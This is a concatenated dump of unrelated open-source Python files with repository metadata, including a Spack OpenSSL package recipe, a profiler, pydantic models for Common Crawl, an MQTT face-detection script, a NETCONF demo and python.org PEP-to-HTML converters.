#%%
from matplotlib import pyplot as plt
#%%
b=np.reshape(a,[400,400])
print b
plt.figure()
plt.pcolor(np.reshape(a,[400,400])) | 1.851563 | 2 |
var/spack/repos/builtin/packages/openssl/package.py | vitodb/spack | 0 | 1107 | <filename>var/spack/repos/builtin/packages/openssl/package.py
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import llnl.util.tty as tty
from spack import *
import spack.architecture
import os
class Openssl(Package): # Uses Fake Autotools, should subclass Package
"""OpenSSL is an open source project that provides a robust,
commercial-grade, and full-featured toolkit for the Transport
Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
It is also a general-purpose cryptography library."""
homepage = "http://www.openssl.org"
# URL must remain http:// so Spack can bootstrap curl
url = "http://www.openssl.org/source/openssl-1.1.1d.tar.gz"
list_url = "http://www.openssl.org/source/old/"
list_depth = 1
# The latest stable version is the 1.1.1 series. This is also our Long Term
# Support (LTS) version, supported until 11th September 2023.
version('1.1.1g', sha256='ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46')
version('1.1.1f', sha256='186c6bfe6ecfba7a5b48c47f8a1673d0f3b0e5ba2e25602dd23b629975da3f35')
version('1.1.1e', sha256='694f61ac11cb51c9bf73f54e771ff6022b0327a43bbdfa1b2f19de1662a6dcbe')
version('1.1.1d', sha256='1e3a91bc1f9dfce01af26026f856e064eab4c8ee0a8f457b5ae30b40b8b711f2')
version('1.1.1c', sha256='f6fb3079ad15076154eda9413fed42877d668e7069d9b87396d0804fdb3f4c90')
version('1.1.1b', sha256='5c557b023230413dfb0756f3137a13e6d726838ccd1430888ad15bfb2b43ea4b')
version('1.1.1a', sha256='fc20130f8b7cbd2fb918b2f14e2f429e109c31ddd0fb38fc5d71d9ffed3f9f41')
version('1.1.1', sha256='2836875a0f89c03d0fdf483941512613a50cfb421d6fd94b9f41d7279d586a3d')
# The 1.1.0 series is out of support and should not be used.
version('1.1.0l', sha256='74a2f756c64fd7386a29184dc0344f4831192d61dc2481a93a4c5dd727f41148')
version('1.1.0k', sha256='efa4965f4f773574d6cbda1cf874dbbe455ab1c0d4f906115f867d30444470b1')
version('1.1.0j', sha256='31bec6c203ce1a8e93d5994f4ed304c63ccf07676118b6634edded12ad1b3246')
version('1.1.0i', sha256='ebbfc844a8c8cc0ea5dc10b86c9ce97f401837f3fa08c17b2cdadc118253cf99')
version('1.1.0g', sha256='de4d501267da39310905cb6dc8c6121f7a2cad45a7707f76df828fe1b85073af')
version('1.1.0e', sha256='57be8618979d80c910728cfc99369bf97b2a1abd8f366ab6ebdee8975ad3874c')
version('1.1.0d', sha256='7d5ebb9e89756545c156ff9c13cf2aa6214193b010a468a3bc789c3c28fe60df')
version('1.1.0c', sha256='fc436441a2e05752d31b4e46115eb89709a28aef96d4fe786abe92409b2fd6f5')
# The 1.0.2 series is out of support and should not be used.
version('1.0.2u', sha256='ecd0c6ffb493dd06707d38b14bb4d8c2288bb7033735606569d8f90f89669d16')
version('1.0.2t', sha256='14cb464efe7ac6b54799b34456bd69558a749a4931ecfd9cf9f71d7881cac7bc')
version('1.0.2s', sha256='cabd5c9492825ce5bd23f3c3aeed6a97f8142f606d893df216411f07d1abab96')
version('1.0.2r', sha256='ae51d08bba8a83958e894946f15303ff894d75c2b8bbd44a852b64e3fe11d0d6')
version('1.0.2p', sha256='50a98e07b1a89eb8f6a99477f262df71c6fa7bef77df4dc83025a2845c827d00')
version('1.0.2o', sha256='ec3f5c9714ba0fd45cb4e087301eb1336c317e0d20b575a125050470e8089e4d')
version('1.0.2n', sha256='370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe')
version('1.0.2m', sha256='8c6ff15ec6b319b50788f42c7abc2890c08ba5a1cdcd3810eb9092deada37b0f')
version('1.0.2k', sha256='6b3977c61f2aedf0f96367dcfb5c6e578cf37e7b8d913b4ecb6643c3cb88d8c0')
version('1.0.2j', sha256='e7aff292be21c259c6af26469c7a9b3ba26e9abaaffd325e3dccc9785256c431')
version('1.0.2i', sha256='9287487d11c9545b6efb287cdb70535d4e9b284dd10d51441d9b9963d000de6f')
version('1.0.2h', sha256='1d4007e53aad94a5b2002fe045ee7bb0b3d98f1a47f8b2bc851dcd1c74332919')
version('1.0.2g', sha256='b784b1b3907ce39abf4098702dade6365522a253ad1552e267a9a0e89594aa33')
version('1.0.2f', sha256='932b4ee4def2b434f85435d9e3e19ca8ba99ce9a065a61524b429a9d5e9b2e9c')
version('1.0.2e', sha256='e23ccafdb75cfcde782da0151731aa2185195ac745eea3846133f2e05c0e0bff')
version('1.0.2d', sha256='671c36487785628a703374c652ad2cebea45fa920ae5681515df25d9f2c9a8c8')
# The 1.0.1 version is out of support and should not be used.
version('1.0.1u', sha256='4312b4ca1215b6f2c97007503d80db80d5157f76f8f7d3febbe6b4c56ff26739')
version('1.0.1t', sha256='4a6ee491a2fdb22e519c76fdc2a628bb3cec12762cd456861d207996c8a07088')
version('1.0.1r', sha256='784bd8d355ed01ce98b812f873f8b2313da61df7c7b5677fcf2e57b0863a3346')
version('1.0.1h', sha256='9d1c8a9836aa63e2c6adb684186cbd4371c9e9dcc01d6e3bb447abf2d4d3d093')
version('1.0.1e', sha256='f74f15e8c8ff11aa3d5bb5f276d202ec18d7246e95f961db76054199c69c1ae3')
variant('systemcerts', default=True, description='Use system certificates')
depends_on('zlib')
depends_on('[email protected]:', type=('build', 'test'))
parallel = False
@property
def libs(self):
return find_libraries(['libssl', 'libcrypto'], root=self.prefix.lib)
def handle_fetch_error(self, error):
tty.warn("Fetching OpenSSL failed. This may indicate that OpenSSL has "
"been updated, and the version in your instance of Spack is "
"insecure. Consider updating to the latest OpenSSL version.")
def install(self, spec, prefix):
# OpenSSL uses a variable APPS in its Makefile. If it happens to be set
# in the environment, then this will override what is set in the
# Makefile, leading to build errors.
env.pop('APPS', None)
if str(spec.target.family) in ('x86_64', 'ppc64'):
# This needs to be done for all 64-bit architectures (except Linux,
# where it happens automatically?)
env['KERNEL_BITS'] = '64'
options = ['zlib', 'shared']
if spec.satisfies('@1.0'):
options.append('no-krb5')
# clang does not support the .arch directive in assembly files.
if 'clang' in self.compiler.cc and \
'aarch64' in spack.architecture.sys_type():
options.append('no-asm')
config = Executable('./config')
config('--prefix=%s' % prefix,
'--openssldir=%s' % join_path(prefix, 'etc', 'openssl'),
'-I{0}'.format(self.spec['zlib'].prefix.include),
'-L{0}'.format(self.spec['zlib'].prefix.lib),
*options)
# Remove non-standard compiler options if present. These options are
# present e.g. on Darwin. They are non-standard, i.e. most compilers
# (e.g. gcc) will not accept them.
filter_file(r'-arch x86_64', '', 'Makefile')
make()
if self.run_tests:
make('test') # 'VERBOSE=1'
make('install')
@run_after('install')
def link_system_certs(self):
if '+systemcerts' not in self.spec:
return
system_dirs = [
# CentOS, Fedora, RHEL
'/etc/pki/tls',
# Ubuntu
'/usr/lib/ssl',
# OpenSUSE
'/etc/ssl'
]
pkg_dir = join_path(self.prefix, 'etc', 'openssl')
for directory in system_dirs:
sys_cert = join_path(directory, 'cert.pem')
pkg_cert = join_path(pkg_dir, 'cert.pem')
# If a bundle exists, use it. This is the preferred way on Fedora,
# where the certs directory does not work.
if os.path.exists(sys_cert) and not os.path.exists(pkg_cert):
os.symlink(sys_cert, pkg_cert)
sys_certs = join_path(directory, 'certs')
pkg_certs = join_path(pkg_dir, 'certs')
# If the certs directory exists, symlink it into the package.
# We symlink the whole directory instead of all files because
# the directory contents might change without Spack noticing.
if os.path.isdir(sys_certs) and not os.path.islink(pkg_certs):
os.rmdir(pkg_certs)
os.symlink(sys_certs, pkg_certs)
| 1.359375 | 1 |
vispy/util/profiler.py | izaid/vispy | 0 | 1108 | # -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Adapted from PyQtGraph
import sys
from . import ptime
from .. import config
class Profiler(object):
"""Simple profiler allowing directed, hierarchical measurement of time
intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `VISPYPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `VISPYPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "vispy.." prefix from the module.
"""
_profilers = (config['profile'].split(",") if config['profile'] is not None
else [])
_depth = 0
_msgs = []
# set this flag to disable all or individual profilers at runtime
disable = False
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabled_profiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if (disabled is True or
(disabled == 'env' and len(cls._profilers) == 0)):
return cls._disabled_profiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if (disabled == 'env' and func_qualname not in cls._profilers and
'all' not in cls._profilers): # don't do anything
return cls._disabled_profiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._mark_count = 0
obj._finished = False
obj._firstTime = obj._last_time = ptime.time()
obj._new_msg("> Entering " + obj._name)
return obj
def __call__(self, msg=None, *args):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._mark_count)
self._mark_count += 1
new_time = ptime.time()
elapsed = (new_time - self._last_time) * 1000
self._new_msg(" " + msg + ": %0.4f ms", *(args + (elapsed,)))
self._last_time = new_time
def mark(self, msg=None):
self(msg)
def _new_msg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._new_msg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0] % m[1] for m in self._msgs]))
type(self)._msgs = []
| 2.859375 | 3 |
tests/test_processor.py | vijithv/djangosaml2idp | 1 | 1109 | from django.contrib.auth import get_user_model
from djangosaml2idp.processors import BaseProcessor
User = get_user_model()
class TestBaseProcessor:
def test_extract_user_id_configure_by_user_class(self):
user = User()
user.USERNAME_FIELD = 'email'
user.email = 'test_email'
assert BaseProcessor('entity-id').get_user_id(user) == 'test_email'
def test_extract_user_id_configure_by_settings(self, settings):
"""Should use `settings.SAML_IDP_DJANGO_USERNAME_FIELD` to determine the user id field"""
settings.SAML_IDP_DJANGO_USERNAME_FIELD = 'first_name'
user = User()
user.first_name = 'test_first_name'
assert BaseProcessor('entity-id').get_user_id(user) == 'test_first_name'
| 2.53125 | 3 |
com/ds/SingleLinkedList.py | sasikrishna/python-programs | 0 | 1110 |
class Node:
def __init__(self, data):
self.data = data
self.prev = None
self.next = None
class SingleLinkedList:
def __init__(self):
self.head = None
def add(self, ele):
new_node = Node(ele)
if self.head is None:
self.head = new_node
return
temp_head = self.head
while temp_head.next is not None:
temp_head = temp_head.next;
temp_head.next = new_node;
def contains(self, ele):
temp_head = self.head
while temp_head is not None:
if temp_head.data == ele:
return True
temp_head = temp_head.next
return False
def remove(self, ele):
if self.head is None:
return;
if self.head.data == ele:
self.head = self.head.next
return True
temp_head = self.head.next
prev_node = temp_head
is_node_deleted = False
while temp_head is not None:
if temp_head.data == ele:
is_node_deleted = True
prev_node.next = temp_head.next
break
prev_node = temp_head
temp_head = temp_head.next
return is_node_deleted
def print_list(self):
temp_head = self.head
while temp_head is not None:
print(temp_head.data)
temp_head = temp_head.next
if __name__ == '__main__':
list = SingleLinkedList();
list.add(5)
list.add(4)
list.add(12)
list.add(13)
list.add(19)
list.print_list();
print("List contains element 4", list.contains(4))
print("List contains element 6", list.contains(6))
print("Removing element 13", list.remove(13))
list.print_list();
print("List contains element 13", list.contains(13))
| 3.75 | 4 |
src/data_setup/__init__.py | data-stories/chart-experiment | 0 | 1111 | __all__ = ["data_setup", "chart_params", "base_params"] | 1.09375 | 1 |
src/aiocomcrawl/models.py | rudaporto/aiocomcrawl | 0 | 1112 | from datetime import datetime
from typing import Any, List, Optional, Union
from pydantic import BaseModel, Field, HttpUrl, validator
from pydantic.dataclasses import dataclass
class Index(BaseModel):
id: str
name: str
time_gate: HttpUrl = Field(alias="timegate")
cdx_api: HttpUrl = Field(alias="cdx-api")
@dataclass(frozen=True)
class ResultBody:
mime_detected: Optional[str]
data: Optional[str]
text: Optional[List[str]]
@dataclass(frozen=True)
class ResultMeta:
# todo: these are still raw strings
warc_request_meta: Optional[str]
response_header: Optional[str]
class Result(BaseModel):
url_key: str = Field(alias="urlkey")
timestamp: datetime
url: str
mime: str
mime_detected: str = Field(alias="mime-detected")
status: int
digest: str
length: int
offset: int
filename: str
languages: Optional[str]
encoding: Optional[str]
index_id: Optional[str]
body: Optional[ResultBody]
meta: Optional[ResultMeta]
@validator("timestamp", pre=True)
def parse_timestamp(cls, value: Any) -> Union[datetime, Any]:
if isinstance(value, str):
datetime_value = datetime.strptime(value, "%Y%m%d%H%M%S")
return datetime_value
return value
class SearchPagesRequest(BaseModel):
"""Request existing pages on one index for a given url."""
index: Index
url: str
show_num_pages: str = Field(alias="showNumPages", default="true", const=True)
output: str = "json"
class SearchPagesResponse(BaseModel):
"""Response with the total number of pages in this index for a given url."""
index: Index
url: str
pages: int
class SearchIndexRequest(BaseModel):
"""One page that contains records to be fetched."""
index: Index
url: str
page: int
output: str = "json"
| 2.5 | 2 |
fs/error_tools.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 0 | 1113 | <gh_stars>0
"""Tools for managing OS errors.
"""
from __future__ import print_function
from __future__ import unicode_literals
import errno
from contextlib import contextmanager
import sys
import platform
from . import errors
from six import reraise
_WINDOWS_PLATFORM = platform.system() == 'Windows'
class _ConvertOSErrors(object):
"""Context manager to convert OSErrors in to FS Errors.
"""
FILE_ERRORS = {
64: errors.RemoteConnectionError, # ENONET
errno.EACCES: errors.PermissionDenied,
errno.ENOENT: errors.ResourceNotFound,
errno.EFAULT: errors.ResourceNotFound,
errno.ESRCH: errors.ResourceNotFound,
errno.ENOTEMPTY: errors.DirectoryNotEmpty,
errno.EEXIST: errors.FileExists,
183: errors.DirectoryExists,
#errno.ENOTDIR: errors.DirectoryExpected,
errno.ENOTDIR: errors.ResourceNotFound,
errno.EISDIR: errors.FileExpected,
errno.EINVAL: errors.FileExpected,
errno.ENOSPC: errors.InsufficientStorage,
errno.EPERM: errors.PermissionDenied,
errno.ENETDOWN: errors.RemoteConnectionError,
errno.ECONNRESET: errors.RemoteConnectionError,
errno.ENAMETOOLONG: errors.PathError,
errno.EOPNOTSUPP: errors.Unsupported,
errno.ENOSYS: errors.Unsupported,
}
DIR_ERRORS = FILE_ERRORS.copy()
DIR_ERRORS[errno.ENOTDIR] = errors.DirectoryExpected
DIR_ERRORS[errno.EEXIST] = errors.DirectoryExists
DIR_ERRORS[errno.EINVAL] = errors.DirectoryExpected
if _WINDOWS_PLATFORM: # pragma: no cover
DIR_ERRORS[13] = errors.DirectoryExpected
DIR_ERRORS[267] = errors.DirectoryExpected
FILE_ERRORS[13] = errors.FileExpected
def __init__(self, opname, path, directory=False):
self._opname = opname
self._path = path
self._directory = directory
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
os_errors = (
self.DIR_ERRORS
if self._directory
else self.FILE_ERRORS
)
if exc_type and isinstance(exc_value, EnvironmentError):
_errno = exc_value.errno
fserror = os_errors.get(_errno, errors.OperationFailed)
if _errno == errno.EACCES and sys.platform == "win32":
if getattr(exc_value, 'args', None) == 32: # pragma: no cover
fserror = errors.ResourceLocked
reraise(
fserror,
fserror(
self._path,
exc=exc_value
),
traceback
)
# Stops linter complaining about invalid class name
convert_os_errors = _ConvertOSErrors
@contextmanager
def unwrap_errors(path_replace):
"""Get a context to map OS errors to their `fs.errors` counterpart.
The context will re-write the paths in resource exceptions to be
in the same context as the wrapped filesystem.
The only parameter may be the path from the parent, if only one path
is to be unwrapped. Or it may be a dictionary that maps wrapped
paths on to unwrapped paths.
"""
try:
yield
except errors.ResourceError as e:
if hasattr(e, 'path'):
if isinstance(path_replace, dict):
e.path = path_replace.get(e.path, e.path)
else:
e.path = path_replace
reraise(type(e), e)
| 2.171875 | 2 |
samples/samplenetconf/demos/vr_demo3.py | gaberger/pysdn | 1 | 1114 | <gh_stars>1-10
#!/usr/bin/python
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: <NAME>
@status: Development
@version: 1.1.0
"""
import time
import json
from pysdn.controller.controller import Controller
from pysdn.netconfdev.vrouter.vrouter5600 import VRouter5600
from pysdn.common.status import STATUS
from pysdn.common.utils import load_dict_from_file
def vr_demo_3():
f = "cfg4.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit()
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
nodeIpAddr = d['nodeIpAddr']
nodePortNum = d['nodePortNum']
nodeUname = d['nodeUname']
nodePswd = d['nodePswd']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("\n")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
vrouter = VRouter5600(ctrl, nodeName, nodeIpAddr, nodePortNum,
nodeUname, nodePswd)
print ("<<< 'Controller': %s, '%s': %s"
% (ctrlIpAddr, nodeName, nodeIpAddr))
print ("\n")
time.sleep(rundelay)
node_configured = False
result = ctrl.check_node_config_status(nodeName)
status = result.get_status()
if(status.eq(STATUS.NODE_CONFIGURED)):
node_configured = True
print ("<<< '%s' is configured on the Controller" % nodeName)
elif(status.eq(STATUS.DATA_NOT_FOUND)):
node_configured = False
else:
print ("\n")
print "Failed to get configuration status for the '%s'" % nodeName
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
if node_configured is False:
result = ctrl.add_netconf_node(vrouter)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< '%s' added to the Controller" % nodeName)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
print ("\n")
time.sleep(rundelay)
result = ctrl.check_node_conn_status(nodeName)
status = result.get_status()
if(status.eq(STATUS.NODE_CONNECTED)):
print ("<<< '%s' is connected to the Controller" % nodeName)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.brief().lower())
exit(0)
print("\n")
print ("<<< Show configuration of the '%s'" % nodeName)
time.sleep(rundelay)
result = vrouter.get_cfg()
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("'%s' configuration:" % nodeName)
cfg = result.get_data()
data = json.loads(cfg)
print json.dumps(data, indent=4)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.brief().lower())
exit(0)
print "\n"
print (">>> Remove '%s' NETCONF node from the Controller" % nodeName)
time.sleep(rundelay)
result = ctrl.delete_netconf_node(vrouter)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("'%s' NETCONF node was successfully removed "
"from the Controller" % nodeName)
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.brief())
exit(0)
print ("\n")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
vr_demo_3()
| 1.585938 | 2 |
python/index.py | stijnvanhulle/EscapeGame | 1 | 1115 | <gh_stars>1-10
# @Author: <NAME> <stijnvanhulle>
# @Date: 2016-11-28T13:51:38+01:00
# @Email: <EMAIL>
# @Last modified by: stijnvanhulle
# @Last modified time: 2016-12-20T12:51:07+01:00
# @License: stijnvanhulle.be
#!/usr/bin/env python
import time
import datetime
import math
import sys
import json
import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish
import lib.faceDetection as faceDetection
import lib.levelCalculation as levelCalculation
MQTT_BROKER="localhost"
client = mqtt.Client()
#classes
def on_connect(client, userdata, rc):
print("Connected to MQTT-broker on " + MQTT_BROKER )
client.subscribe("online")
client.subscribe("message")
client.subscribe("detection_find")
client.subscribe("detection_found")
client.subscribe("recalculate_start")
client.subscribe("recalculate_done")
def on_message(client, userdata, msg):
try:
parsed_json=json.loads(convertJson(msg.payload))
if msg.topic=="detection_find":
print(parsed_json)
_image1 =parsed_json['image1']
_image2 =parsed_json['image2']
_read=parsed_json['read']
if _read:
if _image1 is not None and _image2 is not None:
percent=faceDetection.getDifference(_image1,_image2)
print('Detection:' + str(percent))
client.publish("detection_found", makeJsonObject_detection(percent,_image1,_image2,_read))
if msg.topic=="recalculate_start":
print(parsed_json)
_data =parsed_json['data']
_file=parsed_json['file']
if _data is not None:
calcObj=levelCalculation.calculate(_data,_file)
print('CalculatedOBJ:' + str(calcObj))
client.publish("recalculate_done", makeJsonObject_levelCalculate(calcObj['data'],calcObj['score']))
except Exception as error:
print('Error:',error)
def convertJson(data):
data=data.decode()
if data.startswith("'") and data.endswith("'"):
data = data[1:-1]
print(data)
return data
def makeJsonOnlineObject(device=''):
item=json.dumps({"device":device})
return str(item)
def init():
client.on_connect = on_connect
client.on_message = on_message
client.connect_async(MQTT_BROKER, 1883, 60)
client.loop_start()
time.sleep(0.2)
client.publish("online", makeJsonOnlineObject('FaceDetection'))
def makeJsonObject(value=None,port=None,type=None,read=False):
item=json.dumps({"port":port, "type":type,"value":value,"read":read})
return str(item)
def makeJsonObject_detection(value=None,image1=None,image2=None,read=False):
item=json.dumps({"value":value, "image1":image1,"image2":image2, "read":read})
return str(item)
def makeJsonObject_levelCalculate(data=None,score=0):
item=json.dumps({"data":data,"score":score})
return str(item)
def main():
init()
while True:
time.sleep(0.1)
data = input("Code:")
if data is not None:
try:
if data=='exit':
exit()
sys.exit(0)
else:
parsed_json=json.loads(convertJson(msg.payload))
_type =parsed_json['type']
_port=parsed_json['port']
_read=parsed_json['read']
if _type is not None and _port is not None and _read is not None:
item=str(json.dumps(parsed_json))
print(item)
#client.publish("message",item)
client.publish("detection",item)
else:
throw('Not correct data')
except Exception as error:
print('Error:',error)
if __name__ == '__main__':
try:
if len(sys.argv)>1:
MQTT_BROKER=sys.argv[1]
else:
input_text = input("Ip of MQTT-broker: ")
if input_text:
MQTT_BROKER=input_text
#executor = ProcessPoolExecutor(2)
#loop = trollius.get_event_loop()
#_main = trollius.async(loop.run_in_executor(executor, main))
main()
except (TypeError) as ex:
error="Error: " + str(ex)
#print(error)
except (KeyboardInterrupt):
exit()
print("\nIOT is afgesloten\n")
sys.exit(0)
except (SystemExit):
print("\nIOT is geforceert afgelosten\n")
| 2.21875 | 2 |
Codility/python/tape_equilibrium.py | ajeet1308/code_problems | 61 | 1116 | def solution(A):
total = sum(A)
m = float('inf')
left_sum = 0
for n in A[:-1]:
left_sum += n
v = abs(total - 2*left_sum)
if v < m:
m = v
return m
| 3.234375 | 3 |
peps/converters.py | idjaw/pythondotorg | 0 | 1117 | import re
import os
from bs4 import BeautifulSoup
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files import File
from pages.models import Page, Image
PEP_TEMPLATE = 'pages/pep-page.html'
pep_url = lambda num: 'dev/peps/pep-{}/'.format(num)
def check_paths():
""" Checks to ensure our PEP_REPO_PATH is setup correctly """
if not hasattr(settings, 'PEP_REPO_PATH'):
raise ImproperlyConfigured("No PEP_REPO_PATH in settings")
if not os.path.exists(settings.PEP_REPO_PATH):
raise ImproperlyConfigured("PEP_REPO_PATH in settings does not exist")
def convert_pep0():
"""
Take existing generated pep-0000.html and convert to something suitable
for a Python.org Page returns the core body HTML necessary only
"""
check_paths()
pep0_path = os.path.join(settings.PEP_REPO_PATH, 'pep-0000.html')
pep0_content = open(pep0_path).read()
soup = BeautifulSoup(pep0_content)
body_children = list(soup.body.children)
# Grab header and PEP body
header = body_children[3]
pep_content = body_children[7]
# Fix PEP links
body_links = pep_content.find_all("a")
pep_href_re = re.compile(r'pep-(\d+)\.html')
for b in body_links:
m = pep_href_re.search(b.attrs['href'])
# Skip anything not matching 'pep-XXXX.html'
if not m:
continue
b.attrs['href'] = '/dev/peps/pep-{}/'.format(m.group(1))
# Remove Version from header
header_rows = header.find_all('th')
for t in header_rows:
if 'Version:' in t.text and 'N/A' in t.next_sibling.text:
t.parent.extract()
return ''.join([header.prettify(), pep_content.prettify()])
def get_pep0_page(commit=True):
"""
Using convert_pep0 above, create a CMS ready pep0 page and return it
pep0 is used as the directory index, but it's also an actual pep, so we
return both Page objects.
"""
pep0_content = convert_pep0()
pep0_page, _ = Page.objects.get_or_create(path='dev/peps/')
pep0000_page, _ = Page.objects.get_or_create(path='dev/peps/pep-0000/')
for page in [pep0_page, pep0000_page]:
page.content = pep0_content
page.content_markup_type = 'html'
page.title = "PEP 0 -- Index of Python Enhancement Proposals (PEPs)"
page.template_name = PEP_TEMPLATE
if commit:
page.save()
return pep0_page, pep0000_page
def fix_headers(soup, data):
""" Remove empty or unwanted headers and find our title """
header_rows = soup.find_all('th')
for t in header_rows:
if 'Version:' in t.text:
if t.next_sibling.text == '$Revision$':
t.parent.extract()
if t.next_sibling.text == '':
t.parent.extract()
if 'Last-Modified:' in t.text:
if '$Date$'in t.next_sibling.text:
t.parent.extract()
if t.next_sibling.text == '':
t.parent.extract()
if t.text == 'Title:':
data['title'] = t.next_sibling.text
if t.text == 'Content-Type:':
t.parent.extract()
if 'Version:' in t.text and 'N/A' in t.next_sibling.text:
t.parent.extract()
return soup, data
def convert_pep_page(pep_number, content):
"""
Handle different formats that pep2html.py outputs
"""
check_paths()
data = {
'title': None,
}
if '<html>' in content:
soup = BeautifulSoup(content)
data['title'] = soup.title.text
if not re.search(r'PEP \d+', data['title']):
data['title'] = 'PEP {} -- {}'.format(
pep_number,
soup.title.text,
)
header = soup.body.find('div', class_="header")
header, data = fix_headers(header, data)
data['header'] = header.prettify()
main_content = soup.body.find('div', class_="content")
data['main_content'] = main_content.prettify()
data['content'] = ''.join([
data['header'],
data['main_content']
])
else:
soup = BeautifulSoup(content)
soup, data = fix_headers(soup, data)
if not data['title']:
data['title'] = "PEP {} -- ".format(pep_number)
else:
if not re.search(r'PEP \d+', data['title']):
data['title'] = "PEP {} -- {}".format(
pep_number,
data['title'],
)
data['content'] = soup.prettify()
# Fix PEP links
pep_content = BeautifulSoup(data['content'])
body_links = pep_content.find_all("a")
pep_href_re = re.compile(r'pep-(\d+)\.html')
for b in body_links:
m = pep_href_re.search(b.attrs['href'])
# Skip anything not matching 'pep-XXXX.html'
if not m:
continue
b.attrs['href'] = '/dev/peps/pep-{}/'.format(m.group(1))
data['content'] = pep_content.prettify()
hg_link = "https://hg.python.org/peps/file/tip/pep-{0}.txt".format(pep_number)
data['content'] += """Source: <a href="{0}">{0}</a>""".format(hg_link)
return data
def get_pep_page(pep_number, commit=True):
"""
Given a pep_number retrieve original PEP source text, rst, or html.
Get or create the associated Page and return it
"""
